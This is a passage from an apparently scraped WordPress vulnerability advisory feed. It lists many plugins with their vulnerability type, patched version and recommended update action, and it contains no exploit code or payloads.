Vulnerability: Authenticated (Subscriber+) Directory Traversal to Arbitrary File Write via qcld_openai_upload_pagetraining_file
Patched Version: 4.9.1
Recommended Action: Update to one of the following versions, or a newer patched version: 4.9.1, 4.9.3

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via mf_last_name shortcode
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: CSV Importer

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.3.9
Recommended Action: Update to version 0.3.9, or a newer patched version

Plugin: Poll Maker – Versus Polls, Anonymous Polls, Image Polls

Vulnerability: No subtitle
Patched Version: 3.2.9
Recommended Action: Update to version 3.2.9, or a newer patched version

Plugin: Social Media Widget by Acurax

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Astra Bulk Edit

Vulnerability: Missing Authorization
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: Peadig's Twitter Feed: Embedded Timeline WordPress Plugin

Plugin: GD bbPress Attachments

Vulnerability: Directory Traversal
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Nimble Page Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.2
Recommended Action: Update to version 3.2.2, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Local File Inclusion
Patched Version: 2.1.15
Recommended Action: Update to version 2.1.15, or a newer patched version

Plugin: Migration, Backup, Staging – WPvivid Backup & Migration

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.9.56
Recommended Action: Update to version 0.9.56, or a newer patched version

Plugin: Fancy Gallery – WordPress plugin | Galleries

Plugin: Active Directory Integration / LDAP Integration

Vulnerability: Unauthenticated Information Disclosure
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: LOGIN AND REGISTRATION ATTEMPTS LIMIT

Plugin: Slideshow

Vulnerability: Cross-Site Scripting and Sensitive Information Disclosure
Patched Version: 2.1.13
Recommended Action: Update to version 2.1.13, or a newer patched version

Plugin: Chatbot with IBM watsonx Assistant

Vulnerability: Cross-Site Scripting
Patched Version: 0.8.21
Recommended Action: Update to version 0.8.21, or a newer patched version

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Server-Side Request Forgery
Patched Version: 6.5.3
Recommended Action: Update to version 6.5.3, or a newer patched version

Plugin: Post Grid and Gutenberg Blocks – ComboBlocks

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: Really Simple Guest Post

Vulnerability: Local File Inclusion
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: Super Store Finder

Vulnerability: SQL Injection
Patched Version: 6.5
Recommended Action: Update to version 6.5, or a newer patched version

Plugin: Anti-Spam: Spam Protection | Block Spam Users, Comments, Forms

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2021.9
Recommended Action: Update to version 2021.9, or a newer patched version

Plugin: WordPress Countdown Widget

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.1.9.2
Recommended Action: Update to version 3.1.9.2, or a newer patched version

Plugin: WPCHURCH – Church Management System for WordPress

Vulnerability: Church Management System for WordPress Theme < 13-07-2019
Patched Version: 13-07-2019
Recommended Action: Update to version 13-07-2019, or a newer patched version

Plugin: YASR – Yet Another Star Rating Plugin for WordPress

Vulnerability: Authenticated SQL Injection
Patched Version: 0.9.1
Recommended Action: Update to version 0.9.1, or a newer patched version

Plugin: Auto Rename Media On Upload

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Booking for Appointments and Events Calendar – Amelia

Vulnerability: Arbitrary Booking Update and Sensitive Data Exposure
Patched Version: 1.0.49
Recommended Action: Update to version 1.0.49, or a newer patched version

Plugin: VS Contact Form

Vulnerability: Captcha Bypass
Patched Version: 11.6
Recommended Action: Update to version 11.6, or a newer patched version

Plugin: Update Image Tag Alt Attribute

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.6
Recommended Action: Update to version 2.4.6, or a newer patched version

Plugin: Appointment Booking Calendar

Vulnerability: CSV Injection
Patched Version: 1.3.35
Recommended Action: Update to version 1.3.35, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Authenticated SendWP Plugin Installation and Client Secret Key Disclosure
Patched Version: 3.4.34
Recommended Action: Update to version 3.4.34, or a newer patched version

Plugin: XEN Carousel

Plugin: Email Users

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.8.3
Recommended Action: Update to version 4.8.3, or a newer patched version

Plugin: FormCraft – Form Builder

Vulnerability: Missing Authorization via formcraft_nag_update
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: Portfolio Gallery – Image Gallery Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Twimp WP

Plugin: Loan Comparison

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: WP fancybox

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: Follow Me Plugin

Plugin: Visual CSS Style Editor

Vulnerability: Reflected Cross-Site Scripting via wyp_page_type parameter
Patched Version: 7.5.4
Recommended Action: Update to version 7.5.4, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Arbitrary File Upload
Patched Version: 7.0.2
Recommended Action: Update to version 7.0.2, or a newer patched version

Plugin: JetBlocks for Elementor

Vulnerability: Reflected Cross Site Scripting
Patched Version: 1.3.8.1
Recommended Action: Update to version 1.3.8.1, or a newer patched version

Plugin: Wicked Folders

Vulnerability: Cross-Site Request Forgery via ajax_save_state
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: WP Accessibility Helper (WAH)

Vulnerability: Reflected Cross-Site Scripting via wahi
Patched Version: 0.6.0.7
Recommended Action: Update to version 0.6.0.7, or a newer patched version

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: Cross-Site Scripting
Patched Version: 2.5.10
Recommended Action: Update to version 2.5.10, or a newer patched version

Plugin: Accessibility

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scritping
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: Team Circle Image Slider With Lightbox

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.18
Recommended Action: Update to version 1.0.18, or a newer patched version

Plugin: Gallery – Image and Video Gallery with Thumbnails

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Advanced Order Export For WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 3.1.8
Recommended Action: Update to version 3.1.8, or a newer patched version

Plugin: Google Maps made Simple

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Steveas WP Live Chat Shoutbox

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Cross-Site Request Forgery via ‘uucss_update_rule’
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Perfect Survey

Plugin: Create Block Theme

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: WP Offload SES Lite

Vulnerability: Interpretation Conflict
Patched Version: 1.6.4
Recommended Action: Update to version 1.6.4, or a newer patched version

Plugin: Store Toolkit – WooCommerce Extensions, Quick Enhancements & Handy Tools

Vulnerability: Missing Authorization
Patched Version: 1.5.7
Recommended Action: Update to version 1.5.7, or a newer patched version

Plugin: Opal Estate

Plugin: User Registration & Membership – Custom Registration Form, Login Form, and User Profile

Vulnerability: Authenticated (Administrator+) Stored Cross Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: Stripe Payment Plugin for WooCommerce

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.8.0
Recommended Action: Update to version 3.8.0, or a newer patched version

Plugin: Powerplay Gallery

Plugin: Coupon Affiliates – Affiliate Plugin for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.11.3.4
Recommended Action: Update to version 4.11.3.4, or a newer patched version

Plugin: Extra Block Design, Style, CSS for ANY Gutenberg Blocks

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.2.7
Recommended Action: Update to version 0.2.7, or a newer patched version

Plugin: Parsian Bank Gateway for Woocommerce

Plugin: UpdraftPlus: WP Backup & Migration Plugin

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.22.3
Recommended Action: Update to version 1.22.3, or a newer patched version

Plugin: AmpedSense – AdSense Split Tester

Plugin: Feedweb

Vulnerability: Missing Authorization
Patched Version: 3.0.11
Recommended Action: Update to version 3.0.11, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via plupload.flash.swf
Patched Version: 3.7.14
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.14, 3.8.14, 3.9.12, 4.0.11, 4.1.11, 4.2.8, 4.3.4, 4.4.3, 4.5.2

Plugin: Welcart e-Commerce

Vulnerability: Authenticated (Administrator+) Directory Traversal
Patched Version: 2.9.7
Recommended Action: Update to version 2.9.7, or a newer patched version

Plugin: Affiliate Power – Sales Tracking for Affiliate Marketers

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3.0
Recommended Action: Update to version 2.3.0, or a newer patched version

Plugin: Content Mask

Vulnerability: Authenticated (Subscriber+) Arbitrary Options Update
Patched Version: 1.8.4.1
Recommended Action: Update to version 1.8.4.1, or a newer patched version

Plugin: ConvertPlus

Vulnerability: Unauthenticated Administrator Creation
Patched Version: 3.4.3
Recommended Action: Update to version 3.4.3, or a newer patched version

Plugin: Stream

Vulnerability: Admin+ SQL Injection
Patched Version: 3.8.2
Recommended Action: Update to version 3.8.2, or a newer patched version

Plugin: Radio Buttons for Taxonomies

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: WordPress Book Plugin for Displaying Books in Grid, Flip, Slider, Popup Layout and more

Vulnerability: Authenticator (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Portfolio Slideshow

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: eCommerce Product Catalog Plugin for WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.3.9
Recommended Action: Update to version 3.3.9, or a newer patched version

Plugin: Custom Post Type and Taxonomy GUI Manager

Plugin: Visual Composer Website Builder

Vulnerability: Authenticated Stored Cross-Site Scripting via ‘Title’
Patched Version: 45.0.1
Recommended Action: Update to version 45.0.1, or a newer patched version

Plugin: Accordion

Vulnerability: Unprotected AJAX Action to Stored/Reflected Cross-Site Scripting
Patched Version: 2.2.9
Recommended Action: Update to version 2.2.9, or a newer patched version

Plugin: PICA Photo Gallery

Plugin: BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net

Vulnerability: Cross-Site Request Forgery to Product Manipulation
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Embed Privacy

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Core: WordPress MU

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.5a
Recommended Action: Update to version 1.2.5a, or a newer patched version

Plugin: WordPress Simple HTML Sitemap

Vulnerability: Reflected Cross-Site Scripting via id
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: WPtouch – Make your WordPress Website Mobile-Friendly

Vulnerability: Cross-Site Scripting
Patched Version: 3.7.6
Recommended Action: Update to version 3.7.6, or a newer patched version

Plugin: Advanced Booking Calendar

Plugin: 2Way VideoCalls and Random Chat – HTML5 Webcam Videochat

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.2.8
Recommended Action: Update to version 5.2.8, or a newer patched version

Plugin: LiteSpeed Cache

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 5.7
Recommended Action: Update to version 5.7, or a newer patched version

Plugin: Accept Stripe Donation and Payments – AidWP

Vulnerability: Cross Site Request Forgery
Patched Version: 3.1.6
Recommended Action: Update to version 3.1.6, or a newer patched version

Plugin: Broadcast Live Video – Live Streaming : HTML5, WebRTC, HLS, RTSP, RTMP

Vulnerability: Broadcast Live Video <= 5.5.15
Patched Version: 5.5.16
Recommended Action: Update to version 5.5.16, or a newer patched version

Plugin: Essential Real Estate

Vulnerability: Reflected Cross-Site-Scripting
Patched Version: 4.0.0
Recommended Action: Update to version 4.0.0, or a newer patched version

Plugin: Web Invoice – Invoicing and billing for WordPress

Plugin: Contact Form, Survey, Quiz & Popup Form Builder – ARForms

Vulnerability: Cross-Site Scripting
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: Invitation Based Registrations

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: Advanced Dynamic Pricing for WooCommerce

Vulnerability: Cross-Site Request Forgery via handleSubmitAction function
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: Grou Random Image Widget

Plugin: Profile & Dashboard fields [Modify/Disable/Remove]

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.04
Recommended Action: Update to version 1.04, or a newer patched version

Plugin: WooCommerce Anti-Fraud

Vulnerability: Insecure Direct Object Reference
Patched Version: 3.3
Recommended Action: Update to version 3.3, or a newer patched version

Plugin: Image News Slider

Vulnerability: Unspecified Vulnerability
Patched Version: 3.3
Recommended Action: Update to version 3.3, or a newer patched version

Plugin: Happy Addons for Elementor

Vulnerability: Cross-Site Request Forgery via handle_optin_optout()
Patched Version: 3.8.3
Recommended Action: Update to version 3.8.3, or a newer patched version

Plugin: Newsletter Popup

Vulnerability: Cross-Site Request Forgery to Record Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Import and export users and customers

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.19.2.1
Recommended Action: Update to version 1.19.2.1, or a newer patched version

Plugin: Contact Form by BestWebSoft – Advanced Contact Us Form Builder for WordPress

Vulnerability: Authorization Bypass
Patched Version: 3.83
Recommended Action: Update to version 3.83, or a newer patched version

Plugin: Migration, Backup, Staging – WPvivid Backup & Migration

Vulnerability: Authenticated Arbitrary File Read
Patched Version: 0.9.71
Recommended Action: Update to version 0.9.71, or a newer patched version

Plugin: WooCommerce EAN Payment Gateway

Vulnerability: Missing Authorization to Authenticated (Contributor+) EAN Update
Patched Version: 6.1.0
Recommended Action: Update to version 6.1.0, or a newer patched version

Plugin: Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder

Vulnerability: SQL Injection
Patched Version: 2.05.03
Recommended Action: Update to version 2.05.03, or a newer patched version

Core: WordPress

Vulnerability: Improper Authorization to Information Disclosure
Patched Version: 3.0.5
Recommended Action: Update to version 3.0.5, or a newer patched version

Plugin: Wicked Folders

Vulnerability: Missing Authorization on ajax_add_folder
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: Media Library Categories

Vulnerability: Unauthenticated Multiple Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress Flipbook by Supsystic

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.7.4
Recommended Action: Update to version 1.7.4, or a newer patched version

Plugin: Automated Editor

Vulnerability: Cross-Site Request Forgery via admin menu pages
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Original Media Path

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: User Role by BestWebSoft – Add and Customize Roles and Capabilities in WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.6
Recommended Action: Update to version 1.5.6, or a newer patched version

Plugin: WP Custom Cursors | WordPress Cursor Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Plugin: Wp Cookie Choice

Plugin: which template file

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.9.0
Recommended Action: Update to version 4.9.0, or a newer patched version

Plugin: Easy Newsletter Signups

Plugin: Batch Cat

Plugin: iPages Flipbook For WordPress

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: MultiParcels Shipping For WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.15.4
Recommended Action: Update to version 1.15.4, or a newer patched version

Plugin: 胖鼠采集(Fat Rat Collect) 微信知乎简书腾讯新闻列表分页采集, 还有自动采集、自动发布、自动标签、等多项功能。开源插件

Vulnerability: Missing Authorization
Patched Version: 2.6.1
Recommended Action: Update to version 2.6.1, or a newer patched version

Plugin: Popup Box (Developer) – Create Countdown, Coupon, Video, Contact Form Popups

Vulnerability: 7.9.0) and Developer (20.0.0
Patched Version: 20.9.0
Recommended Action: Update to version 20.9.0, or a newer patched version

Plugin: Conditional shipping & Advanced Flat rate shipping rates / Flexible shipping for WooCommerce shipping

Vulnerability: Cross-Site Request Forgery via enableDisable and deletePost
Patched Version: 1.6.4.6
Recommended Action: Update to version 1.6.4.6, or a newer patched version

Plugin: Advanced Custom Fields: Image Crop Add-on

Vulnerability: Improper Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.5.1.9
Recommended Action: Update to version 2.5.1.9, or a newer patched version

Plugin: Read More Excerpt Link

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: Beebee Mini

Vulnerability: Unauthorized File Upload via ACF
Patched Version: 1.3.0
Recommended Action: Update to version 1.3.0, or a newer patched version

Plugin: Analytify – Google Analytics Dashboard For WordPress (GA4 analytics made easy)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.2.1
Recommended Action: Update to version 4.2.1, or a newer patched version

Plugin: Link Library

Vulnerability: Missing Authorization Checks
Patched Version: 7.2.8
Recommended Action: Update to version 7.2.8, or a newer patched version

Plugin: WP FullCalendar

Vulnerability: Missing Authorization to Information Disclosure
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: Force First and Last Name as Display Name

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: WP OAuth Server (OAuth Authentication)

Vulnerability: Authenticated (Subscriber+) Arbitrary Client Deletion (wo_ajax_remove_client)
Patched Version: 4.3.0
Recommended Action: Update to version 4.3.0, or a newer patched version

Plugin: Comment Reply Notification

Plugin: Open Graph and Twitter Card Tags

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.4.1
Recommended Action: Update to version 2.2.4.1, or a newer patched version

Plugin: WP Background Takeover

Vulnerability: Directory Traversal
Patched Version: 4.1.5
Recommended Action: Update to version 4.1.5, or a newer patched version

Plugin: Easy Preloader

Plugin: Simple Image Gallery

Plugin: WP Songbook

Plugin: Blog2Social: Social Media Auto Post & Scheduler

Vulnerability: Authenticated SQL Injection
Patched Version: 6.3.1
Recommended Action: Update to version 6.3.1, or a newer patched version

Plugin: Shortlink by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Admin Management Xtended

Vulnerability: Cross-Site Request Forgery to Post Status Update
Patched Version: 2.4.5
Recommended Action: Update to version 2.4.5, or a newer patched version

Plugin: Shortcode Redirect

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.02
Recommended Action: Update to version 1.0.02, or a newer patched version

Core: WordPress

Vulnerability: Open Redirect
Patched Version: 2.2.2
Recommended Action: Update to version 2.2.2, or a newer patched version

Plugin: WP Symposium

Vulnerability: Cross-Site Scripting
Patched Version: 13.04
Recommended Action: Update to version 13.04, or a newer patched version

Plugin: Mingle Forum

Vulnerability: SQL Injection
Patched Version: 1.0.34
Recommended Action: Update to version 1.0.34, or a newer patched version

Plugin: User Email Verification for WooCommerce

Plugin: WordPress Tag, Category, and Taxonomy Manager – AI Autotagger

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.0.7.2
Recommended Action: Update to version 3.0.7.2, or a newer patched version

Plugin: Nelio AB Testing

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.6.4
Recommended Action: Update to version 4.6.4, or a newer patched version

Plugin: Ultimate Product Catalog

Vulnerability: SQL Injection
Patched Version: 4.2.23
Recommended Action: Update to version 4.2.23, or a newer patched version

Plugin: HandL UTM Grabber / Tracker

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.6.5
Recommended Action: Update to version 2.6.5, or a newer patched version

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: Simple Membership

Vulnerability: Membership Privilege Escalation
Patched Version: 4.1.3
Recommended Action: Update to version 4.1.3, or a newer patched version

Plugin: 404 to 301 – Redirect, Log and Notify 404 Errors

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: Voting Record

Plugin: Tiger Forms – Drag and Drop Form Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Shield: Blocks Bots, Protects Users, and Prevents Security Breaches

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 13.0.6
Recommended Action: Update to version 13.0.6, or a newer patched version

Plugin: History Log by click5

Vulnerability: Authenticated(Administrator+) Time-Based Blind SQL Injection
Patched Version: 1.0.13
Recommended Action: Update to version 1.0.13, or a newer patched version

Plugin: Ultimate Product Catalog

Vulnerability: Authenticated(Administrator+) Stored Cross-Site Scripting
Patched Version: 5.2.6
Recommended Action: Update to version 5.2.6, or a newer patched version

Plugin: WP-FormAssembly

Vulnerability: Limited Server Side Request Forgery via ‘formassembly’ shortcode
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: Easy Newsletter Signups

Plugin: StoryChief

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.31
Recommended Action: Update to version 1.0.31, or a newer patched version

Plugin: Themify – WooCommerce Product Filter

Vulnerability: WooCommerce Product Filter <= 1.3.7
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: Sp*tify Play Button for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.06
Recommended Action: Update to version 2.06, or a newer patched version

Plugin: MailPoet Newsletters (Previous)

Vulnerability: Multiple SQL Injections
Patched Version: 2.2.1
Recommended Action: Update to version 2.2.1, or a newer patched version

Plugin: WP PDF Generator

Vulnerability: Cross-Site Request Forgery to PDF Settings Update
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Frontend File Manager Plugin

Vulnerability: Privilege Escalation
Patched Version: 18.3
Recommended Action: Update to version 18.3, or a newer patched version

Plugin: Ripe HD FLV

Plugin: WP Tabs – Responsive Tabs and Custom Product Tabs

Vulnerability: Cross Site Request Forgery
Patched Version: 2.1.15
Recommended Action: Update to version 2.1.15, or a newer patched version

Plugin: Code Snippets

Vulnerability: Cross-Site Request Forgery via load
Patched Version: 3.6.0
Recommended Action: Update to version 3.6.0, or a newer patched version

Plugin: Image horizontal reel scroll slideshow

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 13.4
Recommended Action: Update to version 13.4, or a newer patched version

Core: WordPress

Vulnerability: Denial of Service
Patched Version: 2.7
Recommended Action: Update to version 2.7, or a newer patched version

Plugin: Thanh Toán Quét Mã QR Code Tự Động – MoMo, ViettelPay, VNPay và 40 ngân hàng Việt Nam

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: Export any WordPress data to XML/CSV

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: Woo MerchantX

Plugin: Advanced Booking Calendar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6.8
Recommended Action: Update to version 1.6.8, or a newer patched version

Plugin: Search in Place

Vulnerability: Missing Authorization to Feedback Submission
Patched Version: 1.0.105
Recommended Action: Update to version 1.0.105, or a newer patched version

Plugin: Oi Yandex.Maps for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Smooth Page Scroll Up/Down Buttons

Vulnerability: Cross-Site Scripting
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Slider Revolution

Vulnerability: Missing Authorization to Arbitrary File Upload
Patched Version: 3.0.96
Recommended Action: Update to version 3.0.96, or a newer patched version

Plugin: SAHU TikTok Pixel for E-Commerce

Plugin: wp-championship

Vulnerability: SQL Injection
Patched Version: 5.9
Recommended Action: Update to version 5.9, or a newer patched version

Plugin: WP YouTube Lyte

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 1.7.16
Recommended Action: Update to version 1.7.16, or a newer patched version

Plugin: Send PDF for Contact Form 7

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 0.9.2
Recommended Action: Update to version 0.9.2, or a newer patched version

Plugin: WP Travel – Ultimate Travel Booking System, Tour Management Engine

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 4.4.7
Recommended Action: Update to version 4.4.7, or a newer patched version

Plugin: WPS Limit Login

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.4.6.1
Recommended Action: Update to version 1.4.6.1, or a newer patched version

Plugin: Page Builder by SiteOrigin

Vulnerability: Cross-Site Request Forgery to Reflected Cross-Site Scripting
Patched Version: 2.10.16
Recommended Action: Update to version 2.10.16, or a newer patched version

Plugin: Migration, Backup, Staging – WPvivid Backup & Migration

Vulnerability: Missing Authorization via ‘start_staging’ and ‘get_staging_progress’
Patched Version: 0.9.91
Recommended Action: Update to version 0.9.91, or a newer patched version

Plugin: Global Content Blocks

Plugin: Beaver Builder – WordPress Page Builder

Vulnerability: Missing Authorization
Patched Version: 2.5.4.4
Recommended Action: Update to version 2.5.4.4, or a newer patched version

Plugin: Photo Gallery by Supsystic

Vulnerability: Cross-Site Request Forgery to Plugin Settings Change
Patched Version: 1.15.6
Recommended Action: Update to version 1.15.6, or a newer patched version

Plugin: Slider, Gallery, and Carousel by MetaSlider – Image Slider, Video Slider

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.29.1
Recommended Action: Update to version 3.29.1, or a newer patched version

Plugin: Easy Digital Downloads – Per Product Emails

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Core: WordPress

Vulnerability: Authorization Bypass
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: Waiting: One-click countdowns

Plugin: Portfolio and Projects

Vulnerability: Missing Authorization to Notice Dismissal
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: Redirection

Vulnerability: Cross-Site Request Forgery via ‘SaveSettings’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Wicked Folders

Vulnerability: Missing Authorization via ajax_unassign_folders
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: Simple Backup

Vulnerability: Arbitrary File Download via Path Traversal
Patched Version: 2.7.11
